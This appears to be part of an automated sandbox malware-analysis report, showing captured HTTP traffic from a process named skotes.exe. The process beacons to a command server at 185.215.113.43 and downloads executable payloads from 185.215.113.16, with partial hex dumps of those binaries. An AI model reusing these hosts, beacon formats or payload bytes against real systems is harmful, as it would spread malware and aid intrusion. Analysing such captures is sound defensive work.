                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 08 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 ed d3 a7 12 a9 b2 c9 41 a9 b2 c9 41 a9 b2 c9 41 e2 ca ca 40 a3 b2 c9 41 e2 ca cc 40 27 b2 c9 41 e2 ca cd 40 bd b2 c9 41 b8 34 ca 40 bd b2 c9 41 b8 34 cd 40 bb b2 c9 41 b8 34 cc 40 8f b2 c9 41 e2 ca c8 40 aa b2 c9 41 a9 b2 c8 41 fa b2 c9 41 2a 34 c1 40 a8 b2 c9 41 2a 34 36 41 a8 b2 c9 41 2a 34 cb 40 a8 b2 c9 41 52 69 63 68 a9 b2 c9 41 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 85 59 56 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0e 2a 00 b0 24 00 00 f2 03 00 00 00 00 00 c9 01 24 00 00 10 00 00 00 c0 24 00 00 00 40 00 00 10 00 00 00 02 00 00 06 00 00 00 00 00 00 00 06 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$AAA@A@'A@A4@A4@A4@A@AAA*4@A*46AA*4@ARichAPELYVg*$$$@(dm)@%(@%%@(%p%@$.text2$$ `.rdata^$`$@@.data %%@.rsrc%@%%@@.reloc@((@B
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734369993 CET224INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 55 8b ec 83 ec 48 53 8b 5d 14 8b c1 56 8b 75 18 0f bf cb 81 c6 2a 3f 18 59
                                                                                                                                                                                                                                                Data Ascii: UHS]Vu*?YM}6/MWUEEKEE*?YEbE,EQTEnxEELsE1};EzE.EE6/u}uTE7K+E\m
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734586954 CET1236INData Raw: 66 98 76 b9 f4 97 d4 41 0f b7 c0 89 45 e4 8d 87 31 7d 3b ac 89 45 d4 8d 87 d4 4c c6 73 89 5d 14 b3 7d 89 45 e8 8d 42 c2 c7 45 f0 31 30 34 c5 c7 45 d8 5a de 60 5a e9 f3 07 00 00 83 ff 7a 7c 58 8a 5d 10 8d 41 11 88 45 ff 81 c2 c7 a7 00 00 0f bf 05
                                                                                                                                                                                                                                                Data Ascii: fvAE1};ELs]}EBE104EZ`Zz|X]AE(e.UU)(ef(effE+MEEOGvp(e_(eE6/+(eU (Ei(e.]]E;#RE
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734597921 CET1236INData Raw: ee 15 59 34 38 28 0d ca 28 65 00 05 d2 51 e6 54 81 6d 0c 10 6f 00 00 8a 5d 10 89 45 d8 b8 3b 3c ea f6 2b 05 f4 28 65 00 89 45 f0 b8 31 7d 3b ac 2b c2 c6 45 d0 00 81 45 f4 09 ff 00 00 c7 45 ec 09 ff 00 00 89 45 d4 89 75 18 e9 11 03 00 00 3d 36 2f
                                                                                                                                                                                                                                                Data Ascii: Y48((eQTmo]E;<+(eE1};+EEEEu=6/E}bEiQTL(e]M(e6/Mv"Ky}u(e*?YE(e,>EiE+ME,ug(e6/
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734615088 CET1236INData Raw: 02 4d f8 66 d3 3d ec 28 65 00 8b 15 c0 28 65 00 8b 4d 10 d3 ea 0f af d0 b8 6f c9 00 00 5f 5e 5b 89 15 c0 28 65 00 8b e5 5d c2 1c 00 66 3b 45 e4 73 52 8b 45 f8 01 3d d8 28 65 00 0f b7 d0 8b c2 0f b6 c9 0f af 05 c4 28 65 00 5f a3 c4 28 65 00 0f b6
                                                                                                                                                                                                                                                Data Ascii: Mf=(e(eMo_^[(e]f;EsRE=(e(e_(e(e(eXX(e^(eo(e[]E;Ev"(eE_(eo^[]E;Eu%E5(e__(eo^[];Eu$(q-(e+f
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734791994 CET1236INData Raw: 75 d0 8b 75 ec 81 c6 36 8e 60 05 89 45 c4 01 75 c0 8b 75 08 89 45 d4 81 ee a0 37 00 00 8b 45 18 02 45 f0 33 ff 89 55 10 89 45 18 89 75 08 89 75 e0 89 7d 0c e9 d5 08 00 00 b8 af 69 00 00 66 39 45 0c 72 36 69 45 c8 dd 53 00 00 29 75 cc 8b 75 c4 01
                                                                                                                                                                                                                                                Data Ascii: uu6`EuuE7EE3UEuu}if9Er6iES)uu(eEEE+f(euufEu;EuukEM)(e]fEEEME(ei(eiUE(eMumDivEEu
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734802961 CET1236INData Raw: d0 8b 45 e4 01 45 f8 81 c3 9a 4a e0 30 e9 22 04 00 00 3b 75 b4 75 7d 8b 45 b0 81 ea 5f 2c 72 12 01 05 c0 28 65 00 8b 45 f0 2a 45 18 8b 4d ec 01 1d e8 28 65 00 81 e9 1b 6e 77 3b 66 d3 7d d4 d3 2d c4 28 65 00 8b 75 f8 89 45 f0 a0 dc 28 65 00 02 05
                                                                                                                                                                                                                                                Data Ascii: EEJ0";uu}E_,r(eE*EM(enw;f}-(euE(e(eEE(eMM*UMEE+E)uE;]uAE"@uM+AjSuEEjuEE3MEEEZU8UUuxM~
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734818935 CET1236INData Raw: 8d d1 04 00 00 8b 45 f0 81 ea 76 6d c9 14 02 45 14 2b f2 80 45 18 39 81 c2 04 4f 43 5c 89 45 f0 89 75 e0 e9 af 09 00 00 0f b6 d0 3b 55 b4 89 55 a8 8b 55 10 0f 85 88 00 00 00 8b 4d c8 04 7f 8b 75 c4 81 c2 67 f0 bd 6e 03 ce 89 45 18 8b 45 f0 03 75
                                                                                                                                                                                                                                                Data Ascii: EvmE+E9OC\Eu;UUUMugnEEumVMM(eEU(eEE(e(eUMMEMMuE(ef(eEEuuf9Eu<UI&E(efE
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734829903 CET1236INData Raw: ff ff 0f bf 4d 14 3b 4d e8 89 4d 08 8b 4d 1c 75 39 0f b7 45 d0 8a 55 14 03 c8 66 8b 45 fc 00 15 ca 28 65 00 0f b6 c0 89 4d 1c 0f b6 ca 0f af c8 8b 45 f4 2a 45 18 89 45 f4 8b 45 b8 29 05 d8 28 65 00 88 4d fc e9 bc 04 00 00 8b 55 f4 38 55 18 8b 55
                                                                                                                                                                                                                                                Data Ascii: M;MMMu9EUfE(eME*EEE)(eMU8UUvJM(eMinf(eEE(eE(eE(E(]gM;MMr8+}3E+}>(e(e35(ef(euM&MMM;
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.734896898 CET108INData Raw: 3a 8a 0d d8 28 65 00 81 c2 99 e7 75 08 2b 7d dc 8b 45 f8 d2 6d f0 01 05 f4 28 65 00 81 45 ec a4 69 75 4f 66 01 1d dc 28 65 00 33 db 89 7d 0c 89 55 10 8b 4d 1c 8b 55 10 8b 7d dc 8b 45 18 0f b6 c0 69 c0 bc 00 00 00 89 45 18 0f bf 45 e0 3b d8 0f 84
                                                                                                                                                                                                                                                Data Ascii: :(eu+}Em(eEiuOf(e3}UMU}EiEE;fE9Es+E(e
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:16.854470015 CET1236INData Raw: b8 93 ff 00 00 01 0d e8 28 65 00 0f af 1d cc 28 65 00 5f 5e 89 1d cc 28 65 00 5b 8b e5 5d c2 18 00 8b 45 18 3a 45 f0 75 1e b8 17 f3 ff ff 2b c3 2b c7 66 01 05 dc 28 65 00 b8 93 ff 00 00 5f 5e 5b 8b e5 5d c2 18 00 66 8b 45 fc 0f b6 c0 66 39 45 0c
                                                                                                                                                                                                                                                Data Ascii: (e(e_^(e[]E:Eu++f(e_^[]fEf9ErEf)(e_^[]E;rE)(e_^[]Ef9Eu-(e_^[]E;v$(eE(ef)(e_^[]M-(e_^[]


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                5192.168.2.449782185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:23.701237917 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 31 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014791001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.085850000 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:24 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                6192.168.2.449789185.215.113.16807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:25.211365938 CET55OUTGET /well/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558775902 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:25 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 964608
                                                                                                                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 12:24:26 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675c277a-eb800"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 20 01 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 9a c7 83 ae de a6 ed fd de a6 ed fd de a6 ed fd 6a 3a 1c fd fd a6 ed fd 6a 3a 1e fd 43 a6 ed fd 6a 3a 1f fd fd a6 ed fd 40 06 2a fd df a6 ed fd 8c ce e8 fc f3 a6 ed fd 8c ce e9 fc cc a6 ed fd 8c ce ee fc cb a6 ed fd d7 de 6e fd d7 a6 ed fd d7 de 7e fd fb a6 ed fd de a6 ec fd f7 a4 ed fd 7b cf e3 fc 8e a6 ed fd 7b cf ee fc df a6 ed fd 7b cf 12 fd df a6 ed fd de a6 7a fd df a6 ed fd 7b cf ef fc df a6 ed fd 52 69 63 68 de a6 ed fd 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 05 00 72 27 5c 67 00 00 00 00 00 00 00 00 e0 00 22 01 0b 01 0e 10 00 ac 09 00 00 08 05 00 00 00 00 00 77 05 02 00 00 10 00 00 00 c0 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@ !L!This program cannot be run in DOS mode.$j:j:Cj:@*n~{{{z{RichPELr'\g"w@@@@d|@Lu4@.text `.rdata@@.datalpH@.rsrcL@N@@.relocuvB@B
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558900118 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 b9 74 0a 4d 00 e8 38 fd 01 00 68 e9 23 44 00 e8 8f f0 01 00 59 c3 68 f3 23 44 00
                                                                                                                                                                                                                                                Data Ascii: tM8h#DYh#DYh#DrYY<h#DaYQh$DOY0MQ@0MP#h$D/Y%h$DYh!$DYA2h&$DYPh0$DY
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558923960 CET1236INData Raw: b7 6c fd ff ff 8b ce e8 f7 ba 00 00 33 c9 c7 46 0c 01 00 00 00 89 0e 8b 03 8b 40 04 03 c7 39 88 98 fb ff ff 74 35 89 4d fc 51 8d 4d fc 51 8d 88 94 fb ff ff e8 2f 05 00 00 8b 03 8d 8f 98 fb ff ff 8b 40 04 03 c8 e8 c6 04 00 00 8b 03 8b 40 04 03 c7
                                                                                                                                                                                                                                                Data Ascii: l3F@9t5MQMQ/@@ulIOkOu3_OO_`d<IvY|#l)\DItv
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558937073 CET1236INData Raw: 7f 00 00 8d 8e 9c 00 00 00 e8 10 7f 00 00 8d 8e 8c 00 00 00 e8 05 7f 00 00 8d 4e 08 5e e9 00 00 00 00 56 57 8b f9 33 f6 8b 44 f7 04 85 c0 0f 85 4e 0d 04 00 46 83 fe 10 7c ee 5f 5e c3 53 56 8b f1 33 db 57 38 5e 09 0f 85 54 0d 04 00 38 5e 08 75 1c
                                                                                                                                                                                                                                                Data Ascii: N^VW3DNF|_^SV3W8^T8^uNy8tQ~^_^[VN j@VYY^USVW{{u)E0~7GC{_^[u@]8@83Md3f2MA4Mj
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558948994 CET1236INData Raw: 00 5f 5e 5b c9 c2 08 00 49 eb 89 41 eb 86 8d 47 01 89 02 eb dc e8 5b 01 00 00 84 c0 74 0e 8b ca e8 50 01 00 00 84 c0 74 03 b0 01 c3 32 c0 c3 55 8b ec 51 51 56 8b f1 80 be 6d 01 00 00 00 8b 86 68 01 00 00 75 53 ff 70 04 e8 1e 09 00 00 8d 4d ff c7
                                                                                                                                                                                                                                                Data Ascii: _^[IAG[tPt2UQQVmhuSpMEQMQPx$}dtmhuIEA^j@0I0uuUQQVW}EPEEPWNx8OEfx3
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558964014 CET1236INData Raw: 00 83 f8 12 0f 8d e0 04 04 00 83 e8 04 83 f8 0a 77 94 ff 24 85 85 27 40 00 6a 7f 58 66 3b d8 0f 84 c2 06 04 00 8b 19 33 c0 66 85 c0 74 1c 8b 45 90 40 89 45 90 8b 1c 81 0f b7 43 08 66 3b 85 50 ff ff ff 75 e4 e9 9d 06 04 00 83 3b 05 75 df 8b 04 91
                                                                                                                                                                                                                                                Data Ascii: w$'@jXf;3ftE@ECf;Pu;u3f9X'ULUf9Y]79^99L99!:9#, rU]
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.558978081 CET1236INData Raw: 85 79 02 04 00 38 5f 08 75 1c 8b 47 04 6a 08 50 8b 70 04 e8 c8 d5 01 00 59 59 89 77 04 88 5f 09 ff 0f 5f 5e 5b c3 b3 01 eb f3 55 8b ec 56 8b f1 80 7e 09 00 0f 85 5f 02 04 00 6a 08 e8 ad d5 01 00 59 8b 4d 08 8b 09 89 08 8b 4e 04 89 48 04 89 46 04
                                                                                                                                                                                                                                                Data Ascii: y8_uGjPpYYw__^[UV~_jYMNHF^]UQSV3W8^?8^u7~G0EtO ,O$j8WIEYYF^_^[UWVj8)YuON0w^_]UVuWO
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559168100 CET1236INData Raw: a3 88 13 4d 00 ff d6 57 ff 35 8c 13 4d 00 ff d6 5f 5e c3 55 8b ec 83 ec 40 a1 58 13 4d 00 56 33 f6 a3 04 19 4d 00 6a 0f c7 45 c4 30 00 00 00 c7 45 c8 2b 00 00 00 89 75 d0 c7 45 d4 1e 00 00 00 89 45 d8 89 75 e0 ff 15 3c c7 49 00 89 45 e4 8b 45 10
                                                                                                                                                                                                                                                Data Ascii: MW5M_^U@XMV3MjE0E+uEEu<IEEEEEEPuEIE}A0IhIfM IMEPEE;Ijjj!jjIh5M\M4IPj5\MI5`M^UVW
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559180975 CET1236INData Raw: cc 00 00 00 2d 8f 00 00 00 0f 84 d8 fc 03 00 48 83 e8 01 0f 84 ba fc 03 00 2d ff 01 00 00 0f 84 94 fc 03 00 2d ef 00 00 00 0f 84 8f 00 00 00 3b 3d 28 25 4d 00 0f 84 58 fc 03 00 ff 75 0c ff 75 08 57 56 ff 15 08 c7 49 00 5f 5e 5b 8b e5 5d c3 85 c0
                                                                                                                                                                                                                                                Data Ascii: -H--;=(%MXuuWVI_^[]tt%jVIM73jhjV$IhI I=M(%MuIMuQQVMjIU<SVWj,EE0jP
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.559195995 CET1236INData Raw: 4d 00 ff 53 56 57 33 db c7 05 94 19 4d 00 01 01 01 01 68 58 cb 49 00 89 1d 90 19 4d 00 66 89 1d 98 19 4d 00 c6 05 9a 19 4d 00 01 c7 05 9c 19 4d 00 09 00 00 00 89 1d a8 19 4d 00 e8 0a 66 00 00 68 3c cb 49 00 b9 bc 19 4d 00 e8 fb 65 00 00 b9 cc 19
                                                                                                                                                                                                                                                Data Ascii: MSVW3MhXIMfMMMMfh<IMeMrMrMrM4MMMMMMMMj_MMMMMMMMM M$M0Mrud
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:26.679702044 CET1236INData Raw: 53 52 51 ff 15 18 c0 49 00 85 c0 75 4f 8b 45 0c 57 8d 3c 00 8d 45 fc 89 7d fc 50 56 53 53 ff 75 08 ff 75 f8 ff 15 20 c0 49 00 85 c0 75 15 8b 45 fc d1 e8 89 45 fc 3b 45 0c 73 18 33 c9 66 89 0c 46 b3 01 ff 75 f8 ff 15 1c c0 49 00 8a c3 5f 5e 5b c9
                                                                                                                                                                                                                                                Data Ascii: SRQIuOEW<E}PVSSuu IuEE;Es3fFuI_^[3fD72V|M]8MW3=MZ=@M M@I95(Mv"$Mj4$MYY<F;5(Mr5$M=(MYMM<I5M


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                7192.168.2.449808185.215.113.43807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:31.104701042 CET184OUTPOST /Zu7JuNko/index.php HTTP/1.1
                                                                                                                                                                                                                                                Content-Type: application/x-www-form-urlencoded
                                                                                                                                                                                                                                                Host: 185.215.113.43
                                                                                                                                                                                                                                                Content-Length: 31
                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                Data Raw: 64 31 3d 31 30 31 34 37 39 32 30 30 31 26 75 6e 69 74 3d 32 34 36 31 32 32 36 35 38 33 36 39
                                                                                                                                                                                                                                                Data Ascii: d1=1014792001&unit=246122658369
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.493772984 CET193INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:32 GMT
                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                Data Raw: 34 0d 0a 20 3c 63 3e 0d 0a 30 0d 0a 0d 0a
                                                                                                                                                                                                                                                Data Ascii: 4 <c>0


                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                8192.168.2.449814185.215.113.16807576C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:32.634187937 CET56OUTGET /steam/random.exe HTTP/1.1
                                                                                                                                                                                                                                                Host: 185.215.113.16
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970670938 CET1236INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                Date: Fri, 13 Dec 2024 12:52:33 GMT
                                                                                                                                                                                                                                                Content-Type: application/octet-stream
                                                                                                                                                                                                                                                Content-Length: 1794560
                                                                                                                                                                                                                                                Last-Modified: Fri, 13 Dec 2024 12:25:46 GMT
                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                ETag: "675c27ca-1b6200"
                                                                                                                                                                                                                                                Accept-Ranges: bytes
                                                                                                                                                                                                                                                Data Raw: 4d 5a 90 00 03 00 00 00 04 00 00 00 ff ff 00 00 b8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 e8 00 00 00 0e 1f ba 0e 00 b4 09 cd 21 b8 01 4c cd 21 54 68 69 73 20 70 72 6f 67 72 61 6d 20 63 61 6e 6e 6f 74 20 62 65 20 72 75 6e 20 69 6e 20 44 4f 53 20 6d 6f 64 65 2e 0d 0d 0a 24 00 00 00 00 00 00 00 20 8b b6 d4 64 ea d8 87 64 ea d8 87 64 ea d8 87 0b 9c 73 87 7c ea d8 87 0b 9c 46 87 69 ea d8 87 0b 9c 72 87 5e ea d8 87 6d 92 5b 87 67 ea d8 87 6d 92 4b 87 62 ea d8 87 e4 93 d9 86 67 ea d8 87 64 ea d9 87 09 ea d8 87 0b 9c 77 87 77 ea d8 87 0b 9c 45 87 65 ea d8 87 52 69 63 68 64 ea d8 87 00 00 00 00 00 00 00 00 50 45 00 00 4c 01 07 00 19 64 54 67 00 00 00 00 00 00 00 00 e0 00 02 01 0b 01 0a 00 00 96 02 00 00 2a 01 00 00 00 00 00 00 90 68 00 00 10 00 00 00 b0 02 00 00 00 40 00 00 10 00 00 00 02 00 00 05 00 01 00 00 00 00 00 05 00 01 00 00 00 00 00 00 c0 68 00 00 04 00 00 48 fc 1b 00 02 00 40 80 00 00 10 00 00 10 00 00 00 00 [TRUNCATED]
                                                                                                                                                                                                                                                Data Ascii: MZ@!L!This program cannot be run in DOS mode.$ ddds|Fir^m[gmKbgdwwEeRichdPELdTg*h@hH@M$a$$ $h@.rsrc$x@.idata $z@ *$|@hkzervikN~@xvdziszch:@.taggant0h"@@
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970702887 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970716000 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970784903 CET1236INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                                                                                                                                                                Data Ascii:
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970799923 CET1236INData Raw: d2 05 d8 4d 14 bd f2 ea d4 ca 33 62 e2 82 96 0b 90 9e 5a 01 14 7a a1 d1 bb 82 d2 30 b0 fe ca fc a3 3c c3 e3 93 34 bb 0b ef d8 ad 8f f5 64 99 dd 0b 62 ab e1 07 f2 9a 1d e0 82 8e ba 7a 93 82 aa d0 86 76 b9 c8 00 cb e1 d2 aa 9e 39 b8 a2 5a e2 95 63
                                                                                                                                                                                                                                                Data Ascii: M3bZz0<4dbzv9Zct[Ho;kVZ0m'R9Pv)[-:L,PeXsE)`!B%S\rrlcb{r`B{9D
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970805883 CET1236INData Raw: a6 5a 99 a5 b1 72 cf ea d0 83 dd 3e 3c b7 2f 53 05 9a 16 9b a2 62 66 d2 5a 61 76 75 a1 92 09 b3 47 dc 5b a0 98 e1 39 12 f7 d5 72 63 6c d9 5a 0d bf 15 5c 7c 79 b9 f5 11 9b 1d 61 cb 02 84 a8 54 58 cb 97 81 18 f1 5b 30 00 f3 98 5c e0 e2 5a 4e 21 81
                                                                                                                                                                                                                                                Data Ascii: Zr></SbfZavuG[9rclZ\|yaTX[0\ZN!WQ^XOn3O6ubgZu/v=NtrAD'7!0+7p.K?h:hVVA]_q,0[IKI^
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970813990 CET1236INData Raw: d1 cd c2 4d a6 fa 73 79 18 8c 60 da a0 9b 13 cc a5 1e 64 61 d1 eb 4a e7 e1 bc 0a db 53 82 76 69 e8 5c 70 6f 59 ca 22 e0 6b fe 74 e1 1b bf 1e 23 9e 68 e1 e2 97 9a e6 fd 00 8e 05 e7 71 3e 6b e9 d9 a2 68 dd 4b eb 7a 66 a6 44 ab 01 a6 8a a2 4d bc 03
                                                                                                                                                                                                                                                Data Ascii: Msy`daJSvi\poY"kt#hq>khKzfDMPr@MrcQM&uE=~.Jrabimk[zTqZ=;d08o]K[0"2ee"|
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970978975 CET1236INData Raw: 97 b5 68 06 32 a6 3a 56 19 21 5b e5 32 01 3f 14 e0 90 62 2d 18 0b 9e ce 98 ea 5a df 0f bf b2 d1 fd f5 f3 50 a0 8b 92 e2 33 fe 94 dd b8 dc c3 dd 47 90 73 95 98 92 dd 59 dc 0e bc f1 6f 90 94 c5 a1 2a e0 f2 c5 d5 5a e1 bc 17 7b 2b e0 ce c3 e9 33 bc
                                                                                                                                                                                                                                                Data Ascii: h2:V![2?b-ZP3GsYo*Z{+3\M[TdF9Q-?fUAC.)jBoU\rvw~-$krh)QjSvXi+$~Q8OdWu
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.970997095 CET1236INData Raw: 73 83 13 58 a2 cf 63 dd d3 28 57 df 9f b6 96 75 18 c2 91 13 67 82 7a 05 24 ae 68 ea 33 8f 7b 50 1a ba 68 d9 df fe 2a 57 d8 8d 9b ce 03 da 6f df 30 82 6e 53 1a 77 5d 50 59 ff c1 39 9a 93 ca 24 30 93 97 ad a2 17 d3 4e a6 02 9b f8 1b 0e 21 e0 17 0a
                                                                                                                                                                                                                                                Data Ascii: sXc(Wugz$h3{Ph*Wo0nSw]PY9$0N!a$H2iyBSPi>Q|eTPtT h:zXhiWcd+bXM{}z5VPw@iQ:h+k>[
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:33.971009970 CET1236INData Raw: 04 90 62 4d 14 76 de 0e 96 7c f9 47 b8 0e 6c 0b 2c 8b ce 53 a2 67 54 fb 9d 1e d7 df 3f 9c 4a 4c bf 51 54 62 5c 36 94 da ef 07 57 4f c7 8f 68 b1 51 7b 84 09 64 fe 7e a5 b2 ce d7 0b 3b 9c 68 ad a1 66 5b b1 31 bc e7 d1 a2 0a fe 49 a6 82 9f 51 b4 07
                                                                                                                                                                                                                                                Data Ascii: bMv|Gl,SgT?JLQTb\6WOhQ{d~;hf[1IQHkBuq4Gu34I1`!-iKg5+{MC<rBN-Pf!Ft.>;n:o::
                                                                                                                                                                                                                                                Dec 13, 2024 13:52:34.090676069 CET1236INData Raw: b0 84 b8 a0 7e d3 6d 21 ac 4c e1 1c da d2 da 16 e1 2e 9f e7 bb d0 29 b8 1a a8 71 8d 25 b0 74 1d 9d 99 66 1f 1d 68 74 d8 d4 f0 83 07 7e 50 a2 b7 a1 6b 73 93 e8 98 b6 99 e0 10 74 ed a4 ff 6e 51 cc 5e 07 1c 1e bb 1a 86 98 21 28 0e 44 a4 b6 61 84 83
